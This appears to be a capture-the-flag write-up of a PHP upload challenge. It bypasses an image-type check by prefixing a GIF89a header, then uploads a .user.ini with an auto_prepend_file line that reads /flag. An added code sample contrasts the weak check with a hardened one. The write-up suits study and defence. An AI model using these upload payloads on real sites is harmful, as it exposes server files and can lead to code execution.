
First, upload an empty image file to test the waters. The response is exif_imagetype:not image!

After adding a GIF header, the upload succeeds.

Content-Disposition: form-data; name="fileUpload"; filename="100.png"
Content-Type: image/png

GIF89a
------WebKitFormBoundaryH6gYDAtWK7NZlGuJ

Response:

Your dir uploads/e1891fb0b9f190933b53ba7b05c12d2a <br>Your files : <br>array(4) {
[0]=>
string(1) "."
[1]=>
string(2) ".."
[2]=>
string(7) "100.png"
[3]=>
string(9) "index.php"
}

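From the response we can see that the folder holding our upload contains both the file we uploaded and a PHP file, so here we can try uploading a .user.ini or .htaccess configuration file.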

Testing shows that **<?** is filtered.

Here I simply uploaded a .user.ini file, then visited index.php and got the flag.

Content-Disposition: form-data; name="fileUpload"; filename=".user.ini"
Content-Type: image/png

GIF89a
auto_prepend_file=/flag

Response:

Your dir uploads/e1891fb0b9f190933b53ba7b05c12d2a <br>Your files : <br>array(4) {
[0]=>
string(1) "."
[1]=>
string(2) ".."
[2]=>
string(9) ".user.ini"
[3]=>
string(9) "index.php"
}
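
The weakness the two uploads above rely on, shown next to a hardened check. This is an added example, not the challenge's source code: the function names weak_accept and hardened_accept are hypothetical, the sample body is constructed from the request shown on this page, and the exif and GD extensions are assumed to be loaded.

```php
<?php
// Added example; function names are hypothetical, not the challenge's code.

// Weak check, matching the behaviour seen in the responses above: only the
// leading magic bytes are inspected and the client's filename is kept.
function weak_accept(string $tmpPath, string $clientName): ?string
{
    return exif_imagetype($tmpPath) !== false ? $clientName : null;
}

// Hardened check: the client's filename is never used. The stored name is
// random and its extension comes from the detected type, so a dotfile such
// as .user.ini or .htaccess can never be created in the upload directory.
function hardened_accept(string $tmpPath): ?string
{
    $allowed = [IMAGETYPE_GIF, IMAGETYPE_JPEG, IMAGETYPE_PNG];
    $type = @exif_imagetype($tmpPath);
    if ($type === false || !in_array($type, $allowed, true)) {
        return null;
    }
    // Require a full decode rather than a matching signature (needs GD).
    $img = @imagecreatefromstring(file_get_contents($tmpPath));
    if ($img === false) {
        return null;
    }
    return bin2hex(random_bytes(16)) . image_type_to_extension($type);
}

// Constructed sample: the same body this page uploads as .user.ini.
$tmp = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($tmp, "GIF89a\nauto_prepend_file=/flag\n");

var_dump(weak_accept($tmp, '.user.ini'));  // name the weak check would store
var_dump(hardened_accept($tmp));           // result of the hardened check
unlink($tmp);
```

Setting user_ini.filename to an empty value in php.ini stops PHP from scanning for per-directory INI files at all, which removes this class of upload from consideration even if a dotfile is written.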